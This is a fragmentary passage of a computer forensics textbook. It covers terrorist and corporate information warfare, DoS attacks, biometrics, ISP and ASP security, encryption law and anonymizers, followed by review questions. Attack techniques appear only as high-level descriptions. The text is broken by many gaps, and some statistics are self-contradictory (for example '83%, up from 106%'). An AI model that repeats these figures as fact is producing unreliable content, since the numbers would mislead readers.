Although the number of
incidents worldwide declined during the 1990s, the number of fatalities rose
...
Some terrorists believe that ever
more spectacular and lethal acts are necessary to capture public attention
...

During the 1980s, for example, Czechoslovakia reportedly sold over 40,000
tons of Semtex, a plastic explosive, to countries sponsoring international terrorism
...

With bomb-making and other information now widely available, the number
of “amateur” participants has increased
...

A final trend is perhaps the most striking: the rise of religiously motivated terrorism has brought increased lethality
...
This began to change in the 1980s,
and since then a significant share of terrorist groups has been motivated at least
partly by religion
...

In 1996, for example, the year of the Khobar Towers attack, religiously motivated terror accounted for 10 of the 13 extremely violent and high-profile acts
that took place worldwide
...

Mainstream ethnic, separatist, and ideological groups will deviate little from established patterns
...
The sophistication of their weapons will be in their simplicity:

464

Computer Forensics, Second Edition

clever adaptation of technology and materials that are easy to obtain and difficult to trace
...
New entities with systemic, religious, or apocalyptic motivations and greater access to weapons of mass destruction may present a new
and deadlier threat
...

Amateurs, in particular, who may be exploited or manipulated by professional
terrorists or covert sponsors, may be willing to use these weapons
...

The most striking development here is not attacks on America’s information
infrastructure
...
This
change, enabled by the information revolution, makes detecting, preventing,
and responding to terrorist activity more difficult than ever before
...

Future terrorism may often feature information disruption rather than physical destruction
...

Terrorists will continue using advanced information technology to support
these organizational structures
...
This is likely to make terrorism harder to fight
...
There are examples across the conflict spectrum, including the failings of governments to
defeat transnational criminal cartels engaged in drug smuggling and narcoterrorism, as in Colombia
...

Arrests in the United States just before New Year’s Eve 1999 suggest the ability
of such networks to operate across regions
...

Conventional counterterrorism techniques may not work well against such
groups
...

Implications for the Air Force: how can the United States respond to more
lethal, more diverse, and increasingly privatized patterns of terrorism?

An Agenda for Action
The United States needs to formulate a clear, realistic, and realizable national strategy that can evolve with the changing terrorist threat
...
This strategy
leads to key implications for the use of air- and space-based assets
...
Air and space power will be critical elements in defending
U
...
interests—including U
...
Air Force forces—against this evolving threat
...
S
...
With the preceding in mind, when completing the Information Warfare Arsenal and Tactics of Terrorist and Rogues Checklist (Table F15
...
The order is not significant; however, these are
the activities for which the researcher would want to provide a detailed description
of procedures, review, and assessment for ease of use and admissibility
...

Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...


CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...

2
...


466

Computer Forensics, Second Edition

3
...

4
...

5
...

Multiple Choice
1
...
Few countries have programs to develop cyberattack technologies and
could develop such capabilities over the next decade and beyond
...
The U
...
, Russia, China, France, and Israel are developing cyberarsenals
and the means to wage all-out cyberwarfare
...
Terrorist groups are developing weapons of mass destruction
...
Russia has become a breeding ground for computer hackers
...
S
...

E
...

2
...
Shut down Halliburton
B
...
Shut down the transportation system
D
...
Cause links to globalization to break down
3
...
Information attacks
B
...
State sponsors
D
...
The PAF team found that changing technologies and tactics accompany equally
important changes in:
A
...
Unneeded capabilities
C
...
Ongoing analysis and research efforts
E
...
Terrorists have also become more adept at killing, with deadlier weapons made
more easily available through alliances with:
A
...
Organized crime
C
...
Rogue states and private sponsors
E
...
The subject got into the network
and placed several large media files on several computers and changed the desktop
configurations
...
How did the CFS go about conducting the investigation?

HANDS-ON PROJECTS
A local lumber company went up in flames in late September
...
A CFS team
(CFST) received three backup tapes and the hard drive from the system
...
S
...
The plaintiff
claimed that if there were no responsive emails for 10/04–12/04, it was either because there were no responsive emails from that date or because they did not exist
on the accessible backup tapes
...
Prior to leaving the format imaging firm to form his own digital imaging company with his

468

Computer Forensics, Second Edition

codefendant, the defendant emailed the format imaging firm’s customer database
to his home computer in an attempt to steal intellectual property
...
How was the CFS able to go
about conducting the email and database recovery?

REFERENCES
[1] Vacca, John R
...

[2] Vacca, John R
...

[3] Vacca, John R
...
, Charles River Media, Hingham, MA, 1999
...
S
...
S
...
S
...
S
...
Rumsfeld, Chairman, Dr
...
Blechman, General Lee Butler, USAF (Ret
...
Richard L
...
William R
...
William Schneider, Jr
...
Welch, USAF (Ret
...
Paul D
...
James Woolsey and appointed by the Director of Central Intelligence], (http://www
...
gov/hasc/testimony/105thcongress/BMThreat
...

[5] Vacca, John R
...


16

The Information Warfare
Arsenal and Tactics of
Private Companies

lthough the military establishment has put in place certain safeguards from
information warfare (IW) attacks, the state of preparation of private companies is way behind
...
In
addition to the private sector having its own interests in reducing vulnerability in
cyberspace, the integration of military and private sector interests in the information revolution demand it
...
Unscrupulous
companies have always been delighted to take advantage of new opportunities to
sabotage or steal from a dangerous competitor
...
In addition to industrial espionage activities, internal moles or disaffected employees may destroy information networks, and outside groups such as
political activists can also cause significant damage
...

Private corporations are just as dependent on the infrastructures that form the
basis for modern economy—such as telephony, computer networks, electric power,
energy and transportation networks—as are military organizations
...
Often the electronic version is held in preference to and in the absence
of paper records
...

Infrastructure activities: Physical and functional infrastructures are increasingly being controlled by electronics and software rather than mechanical or
electrical means
...

In addition, the distinctions between warfare, crimes, and accidents are increasingly
blurred yet all may have the same damaging results
...
Programs are available free of charge on the Internet to crack passwords or grab key
strokes to recognize them, and there is commercially available software to exploit
network file system applications that allow file sharing
...
A
user or a system may be disabled by “bombing” it with identical and repeated messages and attached files
...

Because of the nature of the competitive market, various programs may be released
without proper assessment or testing, which may leave exploitable gaps
...

Large numbers of highly trained and professional scientists and computer experts may no longer have jobs
...


The Information Warfare Arsenal and Tactics of Private Companies

471

Some estimates claim that 73% of the Russian economy is under the control of
criminal enterprises
...

Estimates claim that 89% of Russian banks are under criminal control
...

Russian organized crime has been identified, in particular, in the following
transnational areas: money laundering, drug trafficking, and commercial fraud
...
” Although it holds much sway in Russia, ROC has
yet to reach a truly transnational existence
...
Here a problem arises: if a terrorist organization has an identifiable and compassing ideology (or proto-strategy), such an
ideology would be general in nature
...

The artificial and superficial equilibrium imposed by the Cold War has been destroyed, and that ROC and FSU instability needs to be added to the countries that
have always used terrorism as a form of diplomacy and an adjunct to their foreign
policies
...

New and dangerous players have emerged in the international arena
...
Whether it be the multinational corporation or a terrorist group that
targets it, both share a common characteristic
...

All these factors have accelerated the erosion of the monopoly of the coercive
power of the state as the disintegration of the old order accelerates
...
These enterprises include everything
from arms traders to drug cartels, which will provide and use existing and new
weapons in terrorist campaigns as a part of their pursued profit and political power
...
They move
in what has been called the “gray areas,” those regions where crime control has

472

Computer Forensics, Second Edition

shifted from legitimate governments to new half political, half criminal powers
...
Each will seek out new and profitable
targets through terrorism in an international order that is already under assault
...
This rejection is by no means complete (both corporations and terrorists exist at a substate level to some degree)
...

Although some might argue that multinational corporations and terrorist
groups stand at either end of a spectrum, the spectrum would still be that of a
movement away from “state-centrism” and the concentration of coercive power
in the state—with the danger that they each move so far away from one another
and that they meet up again
...
Such an ambivalence (and an appreciation of the vulnerability of a
corporation) would be brought to the fore, were a corporation to hire the same
cyberterrorists to undermine its competitors
...
In addition, the multinational
corporation, through its simultaneous existence on many planes of definition,
can at any time be seen to be on a similar plane with a substate or non-state
actor, as well as being on a nation-state plane—thus attracting criticism and violence that would have been directed toward the identifiably “official” organs of
the nation-state in previous times
...
At this point, activities may then move to rural or less protected areas
...
A failure to
strengthen and protect a particular part of that operation may cause incalculable
damage to a multinational corporation’s network should a weak network node be
attacked and disabled
...
This section will also briefly cover some discrete
problems that may be encountered in applying traditional forms of risk treatment
to what is essentially a new form of risk, and it will then discuss the possible need
for a new or revised approach to the risk-management system of a corporation in
light of the new form of threat represented by computer terrorism
...
The three elements of IPK are
Open source intelligence
Information technology
Electronic security and counterintelligence
Interestingly, IPK must rely almost entirely on the private sector for sources
and services that will require the development of a new national intelligence and secure approach to take into account what has hitherto been an area in which the private sector has not participated
...
This is known as the
enmeshing phenomenon
...

Common to all aspects of information operations (IPK, IW, and all source intelligence) is open source intelligence
...
Along with this
must go an increasing identification of the private sector with the defense establishment, both in its own perception and in the perception of outsiders
...
It may
also be futile
...

Defensive Tactics to Thwart the Threat of Business Spies
Threats to the security of business information are numerous and they come from
all directions, including organized crime syndicates, terrorists, and governmentsponsored espionage, and most global high-technology companies have little idea
of the array of hostile forces targeted against them
...
S
...

Some of the threats might be obvious, as well as the strategies that companies
can mount against them, but others might not be so cut and dried
...

Government-sponsored intelligence operations against companies seek information about bids on contracts, information that affects the price of commodities, financial data, and banking information
...
To get this sensitive information, government intelligence services
use many of the techniques developed during the Cold War
...
In addition, government intelligence services are known to
plant moles in companies and steal or surreptitiously download files from unsecured computers
...
Messages that are not
encrypted with the latest technology are especially vulnerable
...

Though the French intelligence service is probably the most egregious offender,
it is far from alone
...

The United States, however, is not among them
...
S
...
What the U
...
intelligence

The Information Warfare Arsenal and Tactics of Private Companies

475

community (CIA, NSA, etc
...

Reports originating in Europe, especially France, that the United States is using
signal intelligence capabilities as part of a program called “Echelon” to attack European companies for the economic advantage of U
...
companies is simply not true
...
The result of this history
is that the reservoir of professionally trained intelligence mercenaries is growing
...
Some of these groups are looking for the
greatest amount of destruction, and an attack on the critical information infrastructure of the United States would satisfy that goal
...
Vulnerabilities that all the different types of attackers exploit
include open systems, plug-and-play systems, centralized remote maintenance of
systems, remote dial-in, and weak encryption
...

Companies should review security measures in sensitive areas of their operations such as research and development, talk to traveling executives who carry
company laptops about using precautions to prevent theft, and examine communications with overseas facilities with an eye toward installing commercially available encryption that is all but impossible to crack
...

Company executives should also limit physical access to sensitive data and programs and regularly change computer passwords
...

A basic rule is to take time to identify company-critical information, whether it
is technology, a production technique, basic research and development, financial information, or marketing strategy, and take steps to protect it
...
These are measures that make good business sense even if you are not a target of a government intelligence service, a competitor, a criminal organization, a terrorist, or a hacker
...
Nevertheless, the government and private firms must work together to bolster cybersecurity
...
Other sectors, including telecommunications, transportation,
and waterways, face difficult challenges stemming from a vast array of factors such
as deregulation and market fluctuations
...
There are
some sectors that are ahead of others
...

Obstacles

The information technology (IT) sector has been moving very aggressively
...

Corporate concerns regarding shareholder value and increased competition
may be getting in the way of security progress at some banks, airlines, and telecommunications companies
...
8 billion scam against Citigroup Inc
...

Likewise, the airline and telecommunications sectors have come “under siege”
as a result of deregulation and the current climate of mergers and acquisitions
...

Security protections against cyberattacks in natural gas and electric industries
are being addressed constantly, although the national effort lacks a useful gauge of
how much security is enough
...


SURVIVING OFFENSIVE RUINOUS IW
The principal actors in any cyberterrorist attack on a corporation, and the levels on
which the attack may be made have already been discussed
...

The U
...
General Accounting Office (GAO) has produced a report on information security and computer attacks at the Department of Defense
...
As the sendmail program scans the message for its
address, you will execute the attacker’s code
...

Computer-searching programs: Password cracking and theft is much easier
with powerful computer-searching programs that can match numbers or alphanumeric passwords to a program in a limited amount of time
...

Packet sniffing: An attacker inserts a software program at a remote network or
host computer that monitors information packets sent through the system and
reconstructs the first 125 keystrokes in the connection
...
This
could enable the attacker to obtain the password of a legitimate user and gain
access to the system
...

Trojan horses: An independent program that when called by an authorized
user performs a useful function but also performs unauthorized functions,
which may usurp the user’s privileges
...

It is becoming increasingly difficult for “low-knowledge” attackers to use relatively cheap, “high-sophistication” attack tools to gain access to what was, historically, a relatively impregnable system
...

Surviving a Misbehaving Enemy
Article 99 of the Uniform Code of Military Justice defines misbehavior in the face
of the enemy as any person who, before or in the presence of the enemy:
Runs away
Shamefully abandons, surrenders, or delivers up any command, unit, place, or
military property that it is his or her duty to defend
Through disobedience, neglect, or intentional misconduct endangers the safety
of any such command, unit, place, or military property
Casts away his arms or ammunition
Is guilty of cowardly conduct
Quits his place of duty to plunder or pillage

478

Computer Forensics, Second Edition

Causes false alarms in any command, unit, or place under control of the armed
forces
Willfully fails to do his utmost to encounter, engage, capture, or destroy any
enemy troops, combatants, vessels, aircraft, or other thing, which it is his or her
duty to encounter, engage, capture, or destroy
Does not affect all practical relief and assistance to any troops, combatants, vessels, or aircraft of the armed forces belonging to the United States or their allies when engaged in battle
Shall be punished by death or such punishment, as a court-martial shall direct
Now, you’re wondering what this has to do with network security, IW, or yourself—because you are not at war
...

Every day, someone from a subculture other than your own is waging a battle
against you and your systems
...
You are guilty of misbehavior in front of the enemy by not admitting your own fallibility, by not passing critical information to your own team, and
from your sheer arrogance in thinking that you can’t be bested by some punk kid
...
True, it is not life or death, and
hacked systems aren’t really your enemy, but the concept is the same
...
Open communication is your enemy’s greatest advantage and your greatest weakness
...
In the race to improve security infrastructures faster than hackers can invent methods to penetrate
firewalls [1], it is important to ascertain a user’s identity before permitting access to
protected data
...

New technologies that aim to directly strengthen user authentication include
the use of tokens and smart cards combined with digital certificates
...

Recently, biometrics technology has rapidly pushed through barriers that have
slowed its adoption in mainstream environments
...

The remaining challenge for biometrics is to address the requirements for large-scale
deployments in complex governmental, institutional, and commercial systems
...
A multitiered authentication
system built around these notions is one solution
...
Applications
and transaction systems request a centralized authentication server to confirm or
deny a user’s identity
...

The policy system might maintain extensive rules to meet security requirements that may differ depending on the user, application, or transaction task
...
Thus,
the validation system must be able to layer biometrics approaches, balance matching scores from each matching process, and interpret these results in light of preset
policies
...
It’s critical that companies scale
with system demand
...

The user-interaction tier collects credentials from live users in real time
...
Many types of point-of-service access devices, such as desktops
and laptop computers, mobile phones [2], wireless pocket devices [3], and airport
kiosks, may be used at any time by end users
...
Therefore, the authentication server must dynamically determine what biometric to request, based
on the client device
...
Repositories of this information may be centralized
in protected databases or decentralized within personal tokens or smart cards
...


480

Computer Forensics, Second Edition

Although there are advantages to using biometrics, authentication should not
forego other methods as part of the overall authentication solution
...
Other security technologies, such as
public key infrastructure, also perform critical roles in an overall security model
...
Some forms of disruption
will lead merely to nuisance and economic loss, but other forms will jeopardize
lives
...

Stopping DoS Attacks Together
The most recent round of denial-of-service (DoS) attacks shows that cyberterrorism is alive and well, and that e-businesses and their service providers aren’t doing
enough to stop it
...
After the recent attack on
Microsoft shut off access to everything from Expedia to Hotmail, the company attributed the problem to one employee’s misconfiguration of a router, yet experts
noted that a failure to distribute domain name service (DNS) servers made the
company vulnerable to begin with
...
ISPs are starting to tackle the subject of
network-wide security, but they’re doing it by laying out requirements for their
corporate customers
...
It’s high
time ISPs and their clients started sharing information about what works (and
doesn’t work) in terms of network architecture, data access, and security systems
...
They should give serious thought to
the latest security tools that can stop DoS attacks at their routers
...

Everyone along the e-business food chain has something to lose when a DoS
attack succeeds
...
The ISP loses customer confidence and significant resources in combating

The Information Warfare Arsenal and Tactics of Private Companies

481

the attack
...

ISPs must communicate the types of attacks they’re experiencing
...
With so much at risk, it’s hard to imagine why these
conversations haven’t been taking place all along
...
Glitches in air-traffic-controller screens cause a deadly
mid-air collision above Chicago’s O’Hare Airport, killing over 456 people in both
planes, and over 1,500 people on the ground when the planes plunge into a nearby
crowded shopping center
...
Then in October, a high-power microwave burst fries the electronics at an ebola virus lab research building at Fort Deterick (Frederick, Maryland)
...
S
...
The theory goes that if a well-funded, organized series of cyberattacks were
to strike at a target’s economic and structural nerve centers, it would send the target society into chaos and make it difficult for the military to communicate and
move troops
...

Profile target: Invader gets passwords, then identifies machines and software
running on the network
...

Cover tracks: Invader hides the evidence trail and slips away
...


482

Computer Forensics, Second Edition

The weak areas are in predicting when someone is gathering information for a
later attack, and once a company has been attacked, the problem is in recovery
...
Don’t be surprised if algorithms eventually wind up in the private sector
...
In the
worst-case scenario, every major industry sector would be affected
...

When you’re talking about IW, you’re talking about IT systems used to cripple
the government and economy
...

Since 1999, IW preparedness has moved forward the fastest in the highly regulated and well-organized financial, energy, and telecommunications sectors, but IT
leaders in the private sector say they’re hesitant to report incidents to agencies such
as the NSA and the FBI
...

Although the impact of IW bears the same uncertainty as Y2k did, many IW experts say cyberterrorism and cyberwarfare are inevitable
...
They’ve also shown they can hack armies of unwitting computers and
make those computers do their bidding
...
S
...
So are countries such
as China and Russia, which are developing their own IW capabilities
...
Clearly, the
eventuality of such an attack is present
...

The presidential directive predicts that such a scenario is still years away
...
Let’s count them for a typical worker
...
He needs still another to access
his corporate email
...
When he gets home, he needs a password to log on
to his home computer and a handful more to use online services
...
com and
other online merchants also require a password to make purchases
...

With as unique a fingerprint as a password, corporations can be sure that a person logging on to a computer network is who he or she claims to be
...
According to Gartner Group, within three or
four years about 88% of all corporations will use fingerprint readers or some other
kind of biometric device
...
The 1990s switch to network computing, which moved important data from mainframe computers to
servers, increased the flow of information within a company, but in the process, it
made that information more vulnerable to theft and tampering
...

Corporate networks are not the only potential commercial application for biometrics
...
In recent small tests,
MasterCard began using fingerprints as a substitute for a signature
...
The explosion of ecommerce [4] has also created a gigantic need to authenticate the identity of buyers
...
In 1994, the smallest fingerprint
reader sold by Identicator Technology was the size of a telephone and cost $2,000;
today it’s the size of a sugar cube and sells for $64
...

It’s likely that more than one biometric technology will emerge
...
Facial recognition technology also has its advantages
...
About 11% of all
new PCs, including some laptops, are already equipped with cameras, suggesting
that facial recognition may eventually play a role on the Web
...
Consumers may decide that using a face or
a fingerprint as a password will jeopardize privacy more than protect it
...
The events during that 48-hour period in February
2000 were especially fearsome to service providers, who found out just how vulnerable they were
...

To be sure, most service providers have not created a formal list of security requirements, but many have some kind of policy that dictates what companies can
and cannot do as customers and the kinds of security systems that must be in place
before they can purchase services
...
They also
want IT shops to use tools such as anti-virus software, specified intrusion detection
systems, and anti-spam content filtering
...

Precisely when ISPs started getting tougher is hard to determine, but it’s clear
that ISPs weren’t making these types of security demands before the DoS attacks
began
...
The ISPs’ systems were commandeered and used to launch
virus attacks and DoS attacks, as well as to commit vandalism and theft
...
From the ISPs’ point of view,
their own customers or prospective customers are now security threats
...

Now, all architecture has to be approved by the security desk before services are
offered, and a customer with single-tier access won’t be approved, even though
many want to be
...
The
VPN (the cheaper of the two options) costs an additional $790 per month
...
Sometimes providers
want to look under the hood
...
According to a survey in 2004 by the Computer Securities Institute (CSI) and the San Francisco FBI Computer Intrusion Squad, 83%
of CSI’s 929 member companies detected unauthorized use of their systems during
the previous year, up from 106% in 2003
...
CSI has 973 security professionals onboard (more than one IT

The Information Warfare Arsenal and Tactics of Private Companies

485

person per company in some cases), and 95% consider disgruntled employees to be
the biggest security threat
...
The FBI reports that there are now 500,000 known computer viruses, and that at least 73% of American companies reported that they have
been plagued by some type of computer virus
...
In the past year, ISPs have set up entire departments devoted to fielding
phone calls and handling subpoenas from individuals and companies claiming that
ISP customers are spamming, sending viruses, vandalizing Web sites, and launching DoS attacks
...

They say it’s no longer up to clients to determine how risk-free they want to be
when it comes to e-commerce
...

How much more companies will pay depends on how secure the ISP thinks its
customers’ network should be, but the ISP is, in many cases, dictating the terms
...
This
could mean a huge cash outlay before service even starts
...
This is an emerging trend, not a government regulation, so
it’s entirely fair for IT managers to bark back, particularly when many ISPs still
can’t deliver the security services they’re asking customers to have up front
...
If a company must go elsewhere for security, it then
begs this question: What level of security does the ISP offer corporate customers? If
ISPs demand that customers walk into the relationship with higher levels of security, corporate customers can turn the tables and demand the same of the ISPs
...
When an ISP tells you to
open up your system so they can look around and see if you meet their standards,
tell them you want them to do the same
...
Once companies open up the conversation to include both sides, it
becomes more of a negotiation and less of an ultimatum
...
If
they’re not going to manage a certain aspect of your network, like a certain server,
then they don’t need access
...
Besides, it’s the ISP’s responsibility to monitor a customer’s outgoing traffic, so the
ISP already has access to what it needs to know to protect itself
...

The best way to protect the company is to handle these issues in the service level
agreement (SLA)
...
The ISP market is more competitive than ever
...
The competition means it’s in the ISP’s
best interest to offer corporate customers as much value-added as possible
...

The reality is that even if ISPs can dictate security policies, they will be eager to
offer value-added services
...

A good SLA won’t get the company out of paying more for application service
providers (ASP) and ISP services in the end
...
The truth is that ISPs
will dictate how much security customers will have because they can
...

IT managers should understand that pushing back at the ISPs will only do so
much
...
The ISPs started the trend, but it won’t
end with them
...

Ultimately, the ISPs will protect themselves from outgoing traffic by shutting
Web sites down that have been commandeered for DoS and other attacks
...
It’s only during this interim period that the onus will be on companies that use ISPs to pick up the slack
...
Companies that
want to do business with top-tier providers had better get serious about security
...

An information security officer for the New York State Office of Mental Health
is considering the ASP model, but he’s afraid patient data could end up in the
wrong hands
...
Think
of the commercial windfall if any of these hosting companies started selling social
services data or any other government agencies’ data
...
And indeed it does
...
What is most disturbing is that the hosting companies all had privacy policies in place, which they were violating
...
They could be random terrorists seeking out corporate data (any
data) to destroy as part of an IW tactic
...
At least, that’s what they
claimed to be doing
...
If the customers agree, it could be great, but that is a big if
...

Selling customer data is taboo for most ASPs, whose executives cringe at the
prospect and chalk it up to a few bad apples who will soon be out of business
...
An ASP should also be bound to a privacy policy as part of the service contract
...
Make sure you take a close look at the wording to see what
constitutes a sale or transfer of data (see sidebar, “Data Protection Measure Tips”)
...

Limit staff access to data and set up multiple levels of security
...

Separate the data center from corporate offices
...

Install security cameras in the data center
...

Keep the “what-ifs” in mind: If providers go bust or are acquired, what happens
to the data?
Do a background check on the provider and check references
...

What if the hosting provider goes out of business? Is it permissible to sell its
customers’ information as an asset (as online retailer Toysmart
...


PRIVACY AGREEMENTS
What’s stopping hosting providers from selling their customers’ data? Ethics and little else, according to industry watchdogs
...

Right now, a lot can be bought and sold rather freely, and that includes the business
sector
...
People tend to overlook that
...
Privacy policies have
more holes than Swiss cheese
...
A lot
of ASPs offer free services
...

In their rush to sign on, customers don’t even look at the privacy policy
...
The ASP Industry Consortium
is working with the World Intellectual Property Organization to establish dispute
resolution procedures between ASPs and their customers, covering such areas as
copyright and proprietary rights infringement and loss of data or data integrity
...
Many ASPs, for example, check the backgrounds of the data center staff and restrict their access to
data
...

Another safeguard is making data center employees pass through several security levels, including physical security guards, key-card door access, and even biometric hand scans
...
For example, it’s too easy to say, “I work with
the company,” flash an ID and walk right in
...

To test an ASP’s privacy policy and security measures, customers should hire
an outside auditing firm
...
Some ASPs even
get in on the auditing act
...
TrustE, of San Jose, California,
gives out privacy seals of approval, called “trustmarks,” to Web sites
...
To get a privacy seal of approval, software companies have to disclose their data-gathering
and dissemination practices
...
ASP clients
are sharpening their scrutiny of data privacy
...
Most won’t work with ASPs that don’t have a solid
one in place
...
Although repeated attacks have increased awareness of the problem, and technologies for dealing
with DoS attacks are seemingly on their way, the attacks have become more sophisticated—and the problem is not going away
...

The attacks have gone from just Web servers to enterprises and infrastructure
...
So, what do you do when terrorists
keep attacking?
Solutions on the Way
Several groups are attempting to work together to fight DoS attacks
...
So-called ICMP Traceback Messages, or itrace,
could turn DoS attackers from anonymous vandals into easily tracked criminals
...

The Information Technology Association of America, with 23 other major
technology companies, has formed the Information Technology Information Sharing and Analysis Center, or IT-ISAC
...

Such tracking is difficult today because the tools used by the vandals who start
such attacks can be modified to appear to come from a completely different source
than the real one
...
Without such cooperation, an attacker may be difficult to find, but stopping the attack is possible
...

Today, customers are more interested in keeping their connection to the Internet up and working than prosecuting an attacker
...
They just want to keep on doing business
...
The only solution is to trace things back and

The Information Warfare Arsenal and Tactics of Private Companies

491

turn them off, and that requires a lot of cooperation
...
It has got to be a community effort
...
Without Internet service providers cooperating, tracking the attacks is impossible
...
There are more and more machines out there, and consequently, that means
more and more vulnerable machines
...
Until companies act together to make the Internet more reliable, business on the Net is at risk
...
However, some companies have become either virtual vigilantes or
packet pacifists
...

In December 1999, when protesters were rampaging through Seattle in an attempt to disrupt the World Trade Organization (WTO) summit meeting, other activists were launching a DoS attack on the WTO Web site
...
” The e-hippies coalition, based in the U
...
, never publicly acknowledged that the attack had been turned back on its own server, but the next
day, a notice appeared on the e-hippies site apologizing for people having problems
getting through to its site
...

Conxion, the San Jose hosting service that reversed the attack on the WTO
server, recognized the attack was coming from a single IP address belonging to the
e-hippies server
...
Conxion
was so proud of having given the attackers a dose of their own medicine that it issued a press release about the incident
...

According to industry analysts, most IT professionals will not strike back in cyberspace, for fear of hitting an innocent bystander, but they’re not averse to taking
some action when they’re sure of the perpetrator’s identity
...
Intrusion detection tools, for example, can be configured to reverse attacks
...
Nevertheless, brace your

492

Computer Forensics, Second Edition

networks for more distributed attacks, nastier viruses, and more chaos until these
issues sort themselves out
...


COUNTERING SUSTAINED ROGUE IW
Corporate reputations have taken a sustained beating from rogue Internet messages, fake press releases, and “gripe sites
...

To do that, companies are hiring Internet IW monitoring firms that use software that scans the Internet to find out what’s being said about business clients
...

The investigations usually turn up former employees, disgruntled insiders, or
stock manipulators
...
A flurry of messages may actually be the work of only one or
two people who use different handles to make it look like they’re a crowd
...
It
should be a serious lawsuit, based on a cost-benefit analysis
...
In one recent case, a psycholinguist studied 40
messages from three screen names and concluded that they came from the same
writer because they had the same format: a question in the headline and the answer
in the body
...

Based on the analysis, the psycholinguist surmised that the writer was probably
40, white, professional, and perhaps a day trader
...

Private eyes can also engage suspects in online conversations to seek clues
about their identities, but there’s a danger that the undercover gumshoe could tip
his or her hand or cross the line into entrapment
...
For example, perpetrators may have left some electronic footprints behind by filling out a Web site guest book with the same cybersignature they use later
for derogatory messages
...
If they say it’s snowing
outside, you can check weather records to find out where on the planet it’s
snowing right now, to narrow the suspect pool
...

Apparently, private companies are willing to go to great lengths to identify Internet content that besmirches their corporate reputation or infringes on their intellectual property, but such services can be used for much more than just
defending against sustained rogue IW in the form of defamation and piracy
...

In other words, they begin to use Internet surveillance for benchmarking and
competitive intelligence, such as finding out when a competitor adds a new feature,
such as online customer chat, to its Web site
...

Law enforcement’s new weapons for protection against random rogue IW, with
regard to electronic detection, have spurred privacy proponents to strike back, but will
these shifting tactics by law enforcement agencies really protect private companies?

PROTECTION AGAINST RANDOM ROGUE IW
The growing availability of powerful encryption has, in effect, rewritten the rule
book for creating, storing, and transmitting computer data [5]
...
Governments worldwide have
been sent into a spin for fear secret encryption keys will add to the weapons of terrorists and other criminals
...
Such bans have largely failed
...
Now, some governments are granting law enforcement agencies new
powers and funding the development of new tools to get at computerized data,
encrypted or otherwise
...

New Legislation
One legal tactic being used by states is to require owners of encrypted files to decrypt them when asked to by authorities
...


494

Computer Forensics, Second Edition

In Britain, two recent bills would give law enforcement officers the authority to
compel individuals to decrypt an encrypted file in their possession under pain of a
two-year jail term
...
The bills broadly define encryption, even including
what some consider to be mere data protocol
...
After all, a
suspect may truly be unable to decrypt an encrypted file
...
If public-key encryption was used, the sender of a file will
have the key used to encrypt the file, but rarely, if ever, the decryption key, which
remains the exclusive property of the intended recipient
...
This flaw in the legislation was demonstrated
by a British group that mailed an ostensibly incriminating document to a government official and then destroyed the decryption key, making it impossible for that
official to decode the file, even if “compelled
...
This means the defendant may have a hard time
defending himself and makes it a lot easier for the police to fabricate evidence
...

Escrowed Encryption
Another controversial scheme for letting law enforcement in on encrypted data is
known as escrowed encryption
...
In other words, encrypted files would be protected—
except from the state
...
Even if a sound case could
be made for revealing the decryption key to government personnel, what is to prevent them from reusing that key in the future to look at other documents by the
same user? Furthermore, drug traffickers, terrorists, and others of most concern to
law enforcement are the least likely to use encryption that is openly advertised as
readable by the government
...
Sovereign states, with their own interests to
protect, would object to such a system; this happened with the escrow scheme
known as the “Clipper Chip,” which was heavily promoted by the U
...
government
but largely dismissed by other states
...
In view of such concerns, official support for escrowed encryption has all
but died in the United States and elsewhere
...
They are instead seeking to capitalize on
the unencrypted nature of most digital traffic and to derive information by monitoring that traffic
...

Officially, most states deny the existence of electronic surveillance networks,
but extensive claims of their existence persist
...
Echelon is, according to the Washington,
DC–based Federation of American Scientists, a global network that searches
through millions of interceptions for preprogrammed keywords on fax, telex, and
email messages
...
S
...
It would monitor traffic on both government and commercial networks,
with the stated goal of safeguarding the critical U
...
information infrastructure
...
Meanwhile, a number of civil rights
groups, including the Electronic Privacy Information Center (EPIC), in Washington, DC, and the American Civil Liberties Union, based in New York City, have
challenged FIDNet’s constitutionality
...

Computer Forensics
As society relies increasingly on computers, the amount of crime perpetrated
with the machines has risen in kind
...
Indeed, in their present
shape, computers, the Internet, and email are the most surveillance-friendly
media ever devised
...
Its purpose is not only to find out what files are stored in a computer, but also
to recover files that were created with, stored in, sent by, received from, or merely

496

Computer Forensics, Second Edition

seen by that computer in the past, even if such files were subsequently “deleted” by
the user
...
For example, the
delete command in most software does not delete
...

If it was really deleted, then undelete commands would not work
...
Even if a user were to deliberately
overwrite the original file, the temporary version still lurks in some part of the disk,
often with an unrecognizable name and occasionally even invisible from the conventional directory
...
A recipient of the electronic end result can see how the document evolved over time—not the kind of information most people care to share
...
For example, the popular Web browser Netscape Navigator creates a file called
netscape
...

Simply surfing the Web pushes other data into computer memory, in the guise
of “cookies” and as documents “cached” on one’s disk
...
A remote Web
site could even gain full access to a visitor’s hard disk, depending on how aggressive
that remote site elects to be and how extensive the protective measures taken by the
visitor are
...
Not to be outdone, computer programmers have developed numerous tools that can defeat most computer
forensics tools
...
In the absence of a thorough schooling in the esoteric
details of computers, the odds favor the competent computer forensics investigator
...
In December 1999, for example, the Australian
Parliament passed a bill giving the Australian Security Organization the power to
obtain warrants to access computers and telecommunications services and, if necessary, to delete or alter other data in the target computer and conceal the fact that

The Information Warfare Arsenal and Tactics of Private Companies

497

anything had been done under the warrant
...

Countermeasures
The various legal roadblocks and technical wizardry contrived by governments and
law enforcement to block encryption’s spread have, of course, curbed neither the
need for the technology nor the ingenuity of privacy-loving programmers
...
Among them are anonymizers, which conceal the identity of the person
sending or receiving information, and steganography, which hides the information
...
Less dramatic situations also justify
anonymity, such as placing a personal ad or seeking employment through the Internet without jeopardizing one’s current job
...

Anonymous and pseudonymous remailers are computers that are accessible
through the Internet that launder the true identity of an email sender
...
A pseudonymous remailer replaces the sender’s email
address with a false one and forwards the message to the intended recipient
...

Anonymous remailers come in three flavors: cypherpunk, mixmaster, and Webbased
...
Conceivably, someone with physical access to such a remailer’s phone
lines could correlate the incoming and outgoing traffic and make connections
...
But even mixmasters can be compromised
...
A sending an
encrypted message through a remailer, and Ms
...

Web-based anonymizers range from sites offering conventional anonymizer services to others where the connection between the user’s computer and the anonymizer
is itself encrypted with up to 128-bit encryption
...

For extra privacy, a message may be routed through a series of remailers
...
onion-router
...
What’s more, it allows anonymized and multiply encrypted Web
browsing in real time
...
The initiator instructs router W (in this
